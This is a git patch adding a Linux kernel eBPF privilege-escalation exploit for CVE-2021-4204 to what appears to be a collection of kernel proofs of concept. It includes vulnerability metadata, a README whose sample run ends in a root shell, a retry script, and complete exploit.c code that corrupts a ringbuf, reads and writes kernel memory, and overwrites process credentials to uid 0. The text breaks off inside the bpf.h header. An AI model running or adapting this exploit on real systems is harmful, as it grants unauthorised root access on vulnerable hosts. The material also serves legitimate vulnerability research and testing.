From 66d52d1c13612700872eb748288c87297d21892c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=B1=E6=B0=B8=E6=B8=85?= Date: Wed, 8 Mar 2023 11:37:31 +0000 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2021-4204=E6=A0=B8?= =?UTF-8?q?=E5=BF=83exploit=E7=A8=8B=E5=BA=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 朱永清 --- .../CVE-2021-4204/CVE-2021-4204.yaml | 18 + data/KernelPocs/CVE-2021-4204/README.md | 37 + .../KernelPocs/CVE-2021-4204/build_and_run.sh | 13 + data/KernelPocs/CVE-2021-4204/exploit.c | 505 +++++++ data/KernelPocs/CVE-2021-4204/include/bpf.h | 1161 +++++++++++++++++ .../KernelPocs/CVE-2021-4204/include/config.h | 18 + data/KernelPocs/CVE-2021-4204/include/debug.h | 301 +++++ .../KernelPocs/CVE-2021-4204/include/helper.h | 90 ++ 8 files changed, 2143 insertions(+) create mode 100644 data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml create mode 100644 data/KernelPocs/CVE-2021-4204/README.md create mode 100644 data/KernelPocs/CVE-2021-4204/build_and_run.sh create mode 100644 data/KernelPocs/CVE-2021-4204/exploit.c create mode 100644 data/KernelPocs/CVE-2021-4204/include/bpf.h create mode 100644 data/KernelPocs/CVE-2021-4204/include/config.h create mode 100644 data/KernelPocs/CVE-2021-4204/include/debug.h create mode 100644 data/KernelPocs/CVE-2021-4204/include/helper.h diff --git a/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml b/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml new file mode 100644 index 0000000..6c113a7 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml @@ -0,0 +1,18 @@ +id: CVE-2021-4204 +source: https://github.com/tr3ee/CVE-2021-4204 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + 由于输入验证不正确,在Linux内核的eBPF中发现了越界(OOB)内存访问缺陷。此漏洞允许具有特殊权限的本地攻击者使系统崩溃或泄漏内部信息。 + scope-of-influence: + v5.8 ≤ linux-kernel ≤ 5.16 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-4204 + - https://www.openwall.com/lists/oss-security/2022/01/11/4 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-score: 7.1 + cve-id: CVE-2021-4204 + cwe-id: CWE-787, CEW-20 + tags: cve2021,权限提升 \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/README.md b/data/KernelPocs/CVE-2021-4204/README.md new file mode 100644 index 0000000..8d0c76b --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/README.md @@ -0,0 +1,37 @@ +# CVE-2021-4204 + +Chinese writeup: https://tr3e.ee/posts/cve-2021-4204-linux-kernel-ebpf-lpe.txt + +For educational/research purposes only. Use at your own risk. + +## Build & Run + +```bash +$ sh build_and_run.sh +Build from source... +cc -I include -static -w -o exploit exploit.c +Start exploit! This might take some while... +[*] phase(1/7) 'create bpf map(s)' running +[+] phase(1/7) 'create bpf map(s)' done +[*] phase(2/7) 'corrupt ringbuf' running +Killed +-------------------------------- +[*] phase(1/7) 'create bpf map(s)' running +[+] phase(1/7) 'create bpf map(s)' done +[*] phase(2/7) 'corrupt ringbuf' running +[+] phase(2/7) 'corrupt ringbuf' done +[*] phase(3/7) 'spawn processes' running +[+] phase(3/7) 'spawn processes' done +[*] phase(4/7) 'find cred (slow)' running +[+] phase(4/7) 'find cred (slow)' done +[*] phase(5/7) 'overwrite cred' running +[+] phase(5/7) 'overwrite cred' done +[*] phase(6/7) 'spawn root shell' running +[+] Enjoy root! +# id +uid=0(root) gid=0(root) groups=0(root) +# exit +[+] phase(6/7) 'spawn root shell' done +[*] phase(7/7) 'clean up the mess' running +[+] phase(7/7) 'clean up the mess' done +``` diff --git a/data/KernelPocs/CVE-2021-4204/build_and_run.sh b/data/KernelPocs/CVE-2021-4204/build_and_run.sh new file mode 100644 index 0000000..ea83d21 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/build_and_run.sh @@ -0,0 +1,13 @@ +#!/bin/sh + +cd $(dirname "$0") + +echo "Build from source..." && make + +echo "Start exploit! This might take some while..." + +until ./exploit +do + echo "--------------------------------" + sleep 1 +done \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/exploit.c b/data/KernelPocs/CVE-2021-4204/exploit.c new file mode 100644 index 0000000..b8b2588 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/exploit.c @@ -0,0 +1,505 @@ +#include +#include +#include + +#include "bpf.h" +#include "config.h" +#include "debug.h" +#include "helper.h" + +typedef struct { + u32 rand; + + int comm_fd; + int array_fd; + int ringbuf_fd; + int ringbuf_next_fd; + + int ringbuf_fds[MAP_NUM]; + pid_t processes[PROC_NUM]; + + kaddr_t ringbuf; + kaddr_t ringbuf_pages; + kaddr_t array_map; + kaddr_t array_map_ops; + kaddr_t task_struct; + kaddr_t cred; + + union { + u8 bytes[PAGE_SIZE*8]; + u16 words[0]; + u32 dwords[0]; + u64 qwords[0]; + kaddr_t ptrs[0]; + }; +} context_t; + +typedef struct { + const char* name; + int (*func)(context_t *ctx); + int ignore_error; +} phase_t; + +int create_bpf_maps(context_t *ctx) +{ + int ret = 0; + + ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1); + if (ret < 0) { + WARNF("Failed to create comm map: %d (%s)", ret, strerror(-ret)); + return ret; + } + ctx->comm_fd = ret; + + for (int i = 0; i < MAP_NUM; i++) + { + if ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE)) < 0) { + WARNF("Could not create ringbuf map[%d]: %d (%s)", i, ret, strerror(-ret)); + return ret; + } + ctx->ringbuf_fds[i] = ret; + } + + ctx->rand = urandom(); + + u32 idx = (ctx->rand%(MAP_NUM - 1)); + ctx->ringbuf_fd = ctx->ringbuf_fds[idx]; + ctx->ringbuf_next_fd = ctx->ringbuf_fds[idx+1]; + + DEBUGF("random = 0x%08x, idx = %d", ctx->rand, idx); + + return 0; +} + +int spawn_processes(context_t *ctx) +{ + for (int i = 0; i < PROC_NUM; i++) + { + pid_t child = fork(); + if (child == 0) { + if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) { + WARNF("Could not set name"); + } + uid_t old = getuid(); + kill(getpid(), SIGSTOP); + uid_t uid = getuid(); + if (uid == 0 && old != uid) { + OKF("Enjoy root!"); + system("/bin/sh"); + } + exit(uid); + } + if (child < 0) { + return child; + } + ctx->processes[i] = child; + } + + return 0; +} + +int corrupt_ringbuf(context_t *ctx) +{ + struct bpf_insn insn[] = { + // r0 = bpf_lookup_elem(ctx->comm_fd, 0) + BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd), + BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0), + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), + + // if (r0 == NULL) exit(1) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 1), + BPF_EXIT_INSN(), + + // r9 = r0 + BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), + + // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0xff0, 0) + BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd), + BPF_MOV64_IMM(BPF_REG_2, 0xff0), + BPF_MOV64_IMM(BPF_REG_3, 0x00), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve), + + // if (r0 == NULL) exit(2) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 2), + BPF_EXIT_INSN(), + + // === Overwrite ringbuf's mask to 0x80000fff === + // r0 = BPF_FUNC_ringbuf_submit(r0-(0x3008-0x38), BPF_RB_NO_WAKEUP) + BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (0x3008-0x38)), + BPF_MOV64_REG(BPF_REG_1, BPF_REG_0), + BPF_MOV64_IMM(BPF_REG_2, 1), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit), + + // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x4000-8, 0) + BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd), + BPF_MOV64_IMM(BPF_REG_2, 0x4000-8), + BPF_MOV64_IMM(BPF_REG_3, 0x00), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve), + + // if (r0 == NULL) exit(3) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 3), + BPF_EXIT_INSN(), + + // r6 = (struct ringbuf*)next + BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x2000), + BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0x30), + + // if ((struct ringbuf*)(next)->mask != 0xfff) exit(4); + BPF_MOV64_IMM(BPF_REG_8, 0xfff), + BPF_JMP_REG(BPF_JEQ, BPF_REG_7, BPF_REG_8, 6), + // cleanup on error + BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000), + BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), + BPF_MOV64_IMM(BPF_REG_2, 1), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard), + BPF_MOV64_IMM(BPF_REG_0, 4), + BPF_EXIT_INSN(), + + // We are lucky, do some leak and overwrite next->mask + BPF_ST_MEM(BPF_W, BPF_REG_6, 0x30, 0xFFFFFFFE), + BPF_ST_MEM(BPF_W, BPF_REG_6, 0x34, 0xFFFFFFFF), + + BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x8), // ringbuf addr + BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 8), + BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x38), // ringbuf pages + BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 16), + BPF_ST_MEM(BPF_DW, BPF_REG_9, 0x0, 0x13371337), + + // Clean up + + // r0 = bpf_ringbuf_discard(r6-0x2000, BPF_RB_NO_WAKEUP) + BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000), + BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), + BPF_MOV64_IMM(BPF_REG_2, 1), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard), + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN() + }; + + int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), ""); + if (prog < 0) { + WARNF("Could not load program(corrupt_ringbuf):\n %s", bpf_log_buf); + goto abort; + } + + int err = bpf_prog_skb_run(prog, "TRIGGER", 8); + if (err != 0) { + WARNF("Could not run program(corrupt_ringbuf): %d (%s)", err, strerror(err)); + goto abort; + } + + int key = 0; + err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes); + if (err != 0) { + WARNF("Could not lookup comm map: %d (%s)", err, strerror(err)); + goto abort; + } + + if (ctx->qwords[0] != 0x13371337) { + WARNF("Could not leak kernel address. Try again if the kernel is vulnerable"); + goto abort; + } + + ctx->ringbuf = ctx->ptrs[1] - 8; + ctx->ringbuf_pages = ctx->ptrs[2]; + + DEBUGF("ringbuf @ %p", ctx->ringbuf); + DEBUGF("ringbuf pages @ %p", ctx->ringbuf_pages); + + return 0; + +abort: + if (prog > 0) close(prog); + return -1; +} + +// restricted_rw read(mode >= 0) or write(mode < 0) data with consequences (*kaddr = 0, *(kaddr-8) = bad_value). +int restricted_rw(context_t *ctx, kaddr_t kaddr, void* buf, u8 bpf_size, size_t count, int mode) +{ + int size = 0; + switch (bpf_size) + { + case BPF_DW: + size = 8; + break; + case BPF_W: + size = 4; + break; + case BPF_H: + size = 2; + break; + case BPF_B: + size = 1; + break; + default: + return -1; + } + + int ret = -1; + + u64 delta = ctx->ringbuf_pages + 0x30 - (ctx->ringbuf + 0x3000 + 8); + u64 offset = kaddr - (ctx->ringbuf_pages + 0x30); + u64 tmp[PAGE_SIZE] = {}; + + // DEBUGF("restricted_rw %s %p by %p + %p (delta %p)", mode>=0 ? "read":"write", (void*)kaddr, (void*)ctx->ringbuf_pages + 0x30, (void*)offset, (void*)delta); + + struct bpf_insn prefix[] = { + // r0 = bpf_lookup_elem(ctx->comm_fd, 0) + BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd), + BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0), + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), + + // if (r0 == NULL) exit(1) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 1), + BPF_EXIT_INSN(), + + // r9 = r0 + BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), + + // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x5000-8, 0) + BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd), + BPF_MOV64_IMM(BPF_REG_2, 0x5000-8), + BPF_MOV64_IMM(BPF_REG_3, 0x00), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve), + + // if (r0 == NULL) exit(2) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 2), + BPF_EXIT_INSN(), + + // r8 = delta + BPF_MOV32_IMM(BPF_REG_8, (u32)(delta>>32)), + BPF_MOV32_IMM(BPF_REG_2, (u32)(delta&0xFFFFFFFF)), + BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), + BPF_ALU64_REG(BPF_OR, BPF_REG_8, BPF_REG_2), + + // next->producer_pos = delta + BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x4000), + + // r0 = bpf_ringbuf_discard(r0, BPF_RB_NO_WAKEUP) + BPF_MOV64_REG(BPF_REG_1, BPF_REG_0), + BPF_MOV64_IMM(BPF_REG_2, 1), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard), + + // r0 = bpf_ringbuf_reserve(ctx->ringbuf_next_fd, offset+PAGE_SIZE, 0) # point to ctx->ringbuf_pages + 0x30 + BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_next_fd), + BPF_MOV64_IMM(BPF_REG_2, offset+PAGE_SIZE), + BPF_MOV64_IMM(BPF_REG_3, 0x00), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve), + + // if (r0 == NULL) exit(3) + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), + BPF_MOV64_IMM(BPF_REG_0, 3), + BPF_EXIT_INSN(), + + // *r0 = 0x80000000 + BPF_MOV64_IMM(BPF_REG_1, 1), + BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 31), + BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), + + // r0 += offset + BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, (u32)(offset)), + }; + + struct bpf_insn suffix[] = { + // r0 point to kaddr, we need to fix that before submit + BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (u32)(offset)), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 8), + // r0 = bpf_ringbuf_submit(r0, BPF_RB_NO_WAKEUP) + BPF_MOV64_REG(BPF_REG_1, BPF_REG_0), + BPF_MOV64_IMM(BPF_REG_2, 1), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit), + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN(), + }; + + int prefix_cnt = sizeof(prefix)/sizeof(prefix[0]); + int suffix_cnt = sizeof(suffix)/sizeof(suffix[0]); + + struct bpf_insn* insn = calloc(sizeof(struct bpf_insn), prefix_cnt + suffix_cnt + count*2); + if (!insn) { + WARNF("Failed to allocate insn buffer: out of memory"); + return -1; + } + + struct bpf_insn* p = insn; + + memcpy(p, prefix, sizeof(prefix)); + + p += prefix_cnt; + + u8 src = mode >= 0? BPF_REG_0 : BPF_REG_9; + u8 dst = mode >= 0? BPF_REG_9 : BPF_REG_0; + for (int i = 0; i < count; i++) { + *p++ = BPF_LDX_MEM(bpf_size, BPF_REG_1, src, i*size); + *p++ = BPF_STX_MEM(bpf_size, dst, BPF_REG_1, i*size); + } + + memcpy(p, suffix, sizeof(suffix)); + + int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, prefix_cnt + suffix_cnt + count*2, ""); + if (prog < 0) { + WARNF("Failed to load program(read):\n %s", bpf_log_buf); + goto abort; + } + + int err = 0; + + if (mode < 0) { + memcpy(tmp, buf, size*count); + err = bpf_update_elem(ctx->comm_fd, &err, tmp, 0); + if (err != 0) { + WARNF("Failed to update comm map: %d (%s)", err, strerror(err)); + goto abort; + } + } + + if ((err = bpf_prog_skb_run(prog, "tr3e of SecCoder Security Lab", 30)) != 0) { + WARNF("Failed to run program(read): %d (%s)", err, strerror(err)); + goto abort; + } + + if (mode > 0) { + err = bpf_lookup_elem(ctx->comm_fd, &err, tmp); + if (err != 0) { + WARNF("Failed to lookup comm map: %d (%s)", err, strerror(err)); + goto abort; + } + memcpy(buf, tmp, size*count); + } + + ret = 0; + +abort: + if (prog > 0) close(prog); + return ret; +} + +int find_cred(context_t *ctx) +{ + kaddr_t kaddr = ctx->ringbuf_pages + 0x30; + + for (int i = 0; i < 2*PAGE_SIZE; i++) + { + if (restricted_rw(ctx, kaddr, ctx->bytes, BPF_DW, PAGE_SIZE/8, 1) != 0) { + WARNF("Could not find task_struct from kernel vmalloc memory"); + goto abort; + } + u8 *tmp = ctx->bytes; + size_t size = PAGE_SIZE; + while(true) { + int offset = memoff(tmp, size, __ID__, sizeof(__ID__)); + if (offset < 0) break; + kaddr_t creds[2] = {}; + kaddr_t cred_from_task = kaddr + offset - 0x10; + if (restricted_rw(ctx, cred_from_task, creds, BPF_DW, 2, 1) != 0) { + WARNF("Could not read kernel address %p", cred_from_task); + break; + } + // could be cred or cached_requested_key + kaddr_t cred = creds[1] != NULL ? creds[1] : creds[0]; + DEBUGF("Found an candidate task %p, cred %p", cred_from_task, cred); + if (cred != 0 && cred > ctx->ringbuf_pages && cred < ctx->ringbuf_pages + (1<<29)) { + ctx->cred = cred; + DEBUGF("task struct ~ %p", cred_from_task); + DEBUGF("cred @ %p", ctx->cred); + return 0; + } + tmp += offset + sizeof(__ID__); + size -= offset + sizeof(__ID__); + } + kaddr += PAGE_SIZE; + } + +abort: + return -1; +} + +int overwrite_cred(context_t *ctx) +{ + u64 zero = 0; + if (restricted_rw(ctx, ctx->cred + OFFSET_uid_from_cred, &zero, BPF_W, 1, -1) != 0) { + return -1; + } + if (restricted_rw(ctx, ctx->cred + OFFSET_gid_from_cred, &zero, BPF_W, 1, -1) != 0) { + return -1; + } + if (restricted_rw(ctx, ctx->cred + OFFSET_euid_from_cred, &zero, BPF_W, 1, -1) != 0) { + return -1; + } + if (restricted_rw(ctx, ctx->cred + OFFSET_egid_from_cred, &zero, BPF_W, 1, -1) != 0) { + return -1; + } + + return 0; +} + +int spawn_root_shell(context_t *ctx) +{ + for (int i = 0; i < PROC_NUM; i++) + { + kill(ctx->processes[i], SIGCONT); + } + while(wait(NULL) > 0); + return 0; +} + +int clean_up(context_t *ctx) +{ + close(ctx->comm_fd); + for (int i = 0; i < MAP_NUM; i++) + { + if (ctx->ringbuf_fds[i]) close(ctx->ringbuf_fds[i]); + } + kill(0, SIGCONT); + return 0; +} + +phase_t phases[] = { + { .name = "create bpf map(s)", .func = create_bpf_maps }, + { .name = "corrupt ringbuf", .func = corrupt_ringbuf }, + { .name = "spawn processes", .func = spawn_processes }, + { .name = "find cred (slow)", .func = find_cred }, + { .name = "overwrite cred", .func = overwrite_cred }, + { .name = "spawn root shell", .func = spawn_root_shell }, + { .name = "clean up the mess", .func = clean_up , .ignore_error = 1 }, +}; + +int main(int argc, char** argv) +{ + context_t ctx = {}; + int err = 0; + int max = sizeof(phases) / sizeof(phases[0]); + if (getuid() == 0) { + BADF("You are already root, exiting..."); + return -1; + } + for (int i = 1; i <= max; i++) + { + phase_t *phase = &phases[i-1]; + if (err != 0 && !phase->ignore_error) { + ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name); + continue; + } + ACTF("phase(%d/%d) '%s' running", i, max, phase->name); + int error = phase->func(&ctx); + if (error != 0) { + BADF("phase(%d/%d) '%s' return with error %d", i, max, phase->name, error); + err = error; + } else { + OKF("phase(%d/%d) '%s' done", i, max, phase->name); + } + } + return err; +} \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/include/bpf.h b/data/KernelPocs/CVE-2021-4204/include/bpf.h new file mode 100644 index 0000000..b11bda1 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/include/bpf.h @@ -0,0 +1,1161 @@ +#ifndef _BPF_H_ +#define _BPF_H_ + +#include +#include +#include +#include +#include +#include +#include +#include + +/* Instruction classes */ +#define BPF_CLASS(code) ((code) & 0x07) +#define BPF_LD 0x00 +#define BPF_LDX 0x01 +#define BPF_ST 0x02 +#define BPF_STX 0x03 +#define BPF_ALU 0x04 +#define BPF_JMP 0x05 +#define BPF_RET 0x06 +#define BPF_MISC 0x07 + +/* ld/ldx fields */ +#define BPF_SIZE(code) ((code) & 0x18) +#define BPF_W 0x00 /* 32-bit */ +#define BPF_H 0x08 /* 16-bit */ +#define BPF_B 0x10 /* 8-bit */ +#define BPF_DW 0x18 /* 64-bit */ +#define BPF_MODE(code) ((code) & 0xe0) +#define BPF_IMM 0x00 +#define BPF_ABS 0x20 +#define BPF_IND 0x40 +#define BPF_MEM 0x60 +#define BPF_LEN 0x80 +#define BPF_MSH 0xa0 + +/* alu/jmp fields */ +#define BPF_OP(code) ((code) & 0xf0) +#define BPF_ADD 0x00 +#define BPF_SUB 0x10 +#define BPF_MUL 0x20 +#define BPF_DIV 0x30 +#define BPF_OR 0x40 +#define BPF_AND 0x50 +#define BPF_LSH 0x60 +#define BPF_RSH 0x70 +#define BPF_NEG 0x80 +#define BPF_MOD 0x90 +#define BPF_XOR 0xa0 + +#define BPF_JA 0x00 +#define BPF_JEQ 0x10 +#define BPF_JGT 0x20 +#define BPF_JGE 0x30 +#define BPF_JSET 0x40 +#define BPF_SRC(code) ((code) & 0x08) +#define BPF_K 0x00 +#define BPF_X 0x08 + +/* Extended instruction set based on top of classic BPF */ + +/* instruction classes */ +#define BPF_JMP32 0x06 /* jmp mode in word width */ +#define BPF_ALU64 0x07 /* alu mode in double word width */ + +/* ld/ldx fields */ +#define BPF_DW 0x18 /* double word (64-bit) */ +#define BPF_ATOMIC 0xc0 /* atomic memory ops - op type in immediate */ +#define BPF_XADD 0xc0 /* exclusive add - legacy name */ + +/* alu/jmp fields */ +#define BPF_MOV 0xb0 /* mov reg to reg */ +#define BPF_ARSH 0xc0 /* sign extending arithmetic shift right */ + +/* change endianness of a register */ +#define BPF_END 0xd0 /* flags for endianness conversion: */ +#define BPF_TO_LE 0x00 /* convert to little-endian */ +#define BPF_TO_BE 0x08 /* convert to big-endian */ +#define BPF_FROM_LE BPF_TO_LE +#define BPF_FROM_BE BPF_TO_BE + +/* jmp encodings */ +#define BPF_JNE 0x50 /* jump != */ +#define BPF_JLT 0xa0 /* LT is unsigned, '<' */ +#define BPF_JLE 0xb0 /* LE is unsigned, '<=' */ +#define BPF_JSGT 0x60 /* SGT is signed '>', GT in x86 */ +#define BPF_JSGE 0x70 /* SGE is signed '>=', GE in x86 */ +#define BPF_JSLT 0xc0 /* SLT is signed, '<' */ +#define BPF_JSLE 0xd0 /* SLE is signed, '<=' */ +#define BPF_CALL 0x80 /* function call */ +#define BPF_EXIT 0x90 /* function return */ + +/* atomic op type fields (stored in immediate) */ +#define BPF_FETCH 0x01 /* not an opcode on its own, used to build others */ +#define BPF_XCHG (0xe0 | BPF_FETCH) /* atomic exchange */ +#define BPF_CMPXCHG (0xf0 | BPF_FETCH) /* atomic compare-and-write */ + +/* When BPF ldimm64's insn[0].src_reg != 0 then this can have + * the following extensions: + * + * insn[0].src_reg: BPF_PSEUDO_MAP_FD + * insn[0].imm: map fd + * insn[1].imm: 0 + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of map + * verifier type: CONST_PTR_TO_MAP + */ +#define BPF_PSEUDO_MAP_FD 1 +/* insn[0].src_reg: BPF_PSEUDO_MAP_VALUE + * insn[0].imm: map fd + * insn[1].imm: offset into value + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of map[0]+offset + * verifier type: PTR_TO_MAP_VALUE + */ +#define BPF_PSEUDO_MAP_VALUE 2 +/* insn[0].src_reg: BPF_PSEUDO_BTF_ID + * insn[0].imm: kernel btd id of VAR + * insn[1].imm: 0 + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of the kernel variable + * verifier type: PTR_TO_BTF_ID or PTR_TO_MEM, depending on whether the var + * is struct/union. + */ +#define BPF_PSEUDO_BTF_ID 3 + +/* when bpf_call->src_reg == BPF_PSEUDO_CALL, bpf_call->imm == pc-relative + * offset to another bpf function + */ +#define BPF_PSEUDO_CALL 1 + +/* Register numbers */ +enum { + BPF_REG_0 = 0, + BPF_REG_1, + BPF_REG_2, + BPF_REG_3, + BPF_REG_4, + BPF_REG_5, + BPF_REG_6, + BPF_REG_7, + BPF_REG_8, + BPF_REG_9, + BPF_REG_10, + __MAX_BPF_REG, +}; + +/* BPF has 10 general purpose 64-bit registers and stack frame. */ +#define MAX_BPF_REG __MAX_BPF_REG + +struct bpf_insn { + __u8 code; /* opcode */ + __u8 dst_reg:4; /* dest register */ + __u8 src_reg:4; /* source register */ + __s16 off; /* signed offset */ + __s32 imm; /* signed immediate constant */ +}; + +enum bpf_cmd { + BPF_MAP_CREATE, + BPF_MAP_LOOKUP_ELEM, + BPF_MAP_UPDATE_ELEM, + BPF_MAP_DELETE_ELEM, + BPF_MAP_GET_NEXT_KEY, + BPF_PROG_LOAD, + BPF_OBJ_PIN, + BPF_OBJ_GET, + BPF_PROG_ATTACH, + BPF_PROG_DETACH, + BPF_PROG_TEST_RUN, + BPF_PROG_RUN = BPF_PROG_TEST_RUN, + BPF_PROG_GET_NEXT_ID, + BPF_MAP_GET_NEXT_ID, + BPF_PROG_GET_FD_BY_ID, + BPF_MAP_GET_FD_BY_ID, + BPF_OBJ_GET_INFO_BY_FD, + BPF_PROG_QUERY, + BPF_RAW_TRACEPOINT_OPEN, + BPF_BTF_LOAD, + BPF_BTF_GET_FD_BY_ID, + BPF_TASK_FD_QUERY, + BPF_MAP_LOOKUP_AND_DELETE_ELEM, + BPF_MAP_FREEZE, + BPF_BTF_GET_NEXT_ID, + BPF_MAP_LOOKUP_BATCH, + BPF_MAP_LOOKUP_AND_DELETE_BATCH, + BPF_MAP_UPDATE_BATCH, + BPF_MAP_DELETE_BATCH, + BPF_LINK_CREATE, + BPF_LINK_UPDATE, + BPF_LINK_GET_FD_BY_ID, + BPF_LINK_GET_NEXT_ID, + BPF_ENABLE_STATS, + BPF_ITER_CREATE, + BPF_LINK_DETACH, + BPF_PROG_BIND_MAP, +}; + +enum bpf_map_type { + BPF_MAP_TYPE_UNSPEC = 0, + BPF_MAP_TYPE_HASH = 1, + BPF_MAP_TYPE_ARRAY = 2, + BPF_MAP_TYPE_PROG_ARRAY = 3, + BPF_MAP_TYPE_PERF_EVENT_ARRAY = 4, + BPF_MAP_TYPE_PERCPU_HASH = 5, + BPF_MAP_TYPE_PERCPU_ARRAY = 6, + BPF_MAP_TYPE_STACK_TRACE = 7, + BPF_MAP_TYPE_CGROUP_ARRAY = 8, + BPF_MAP_TYPE_LRU_HASH = 9, + BPF_MAP_TYPE_LRU_PERCPU_HASH = 10, + BPF_MAP_TYPE_LPM_TRIE = 11, + BPF_MAP_TYPE_ARRAY_OF_MAPS = 12, + BPF_MAP_TYPE_HASH_OF_MAPS = 13, + BPF_MAP_TYPE_DEVMAP = 14, + BPF_MAP_TYPE_SOCKMAP = 15, + BPF_MAP_TYPE_CPUMAP = 16, + BPF_MAP_TYPE_XSKMAP = 17, + BPF_MAP_TYPE_SOCKHASH = 18, + BPF_MAP_TYPE_CGROUP_STORAGE = 19, + BPF_MAP_TYPE_REUSEPORT_SOCKARRAY = 20, + BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE = 21, + BPF_MAP_TYPE_QUEUE = 22, + BPF_MAP_TYPE_STACK = 23, + BPF_MAP_TYPE_SK_STORAGE = 24, + BPF_MAP_TYPE_DEVMAP_HASH = 25, + BPF_MAP_TYPE_STRUCT_OPS = 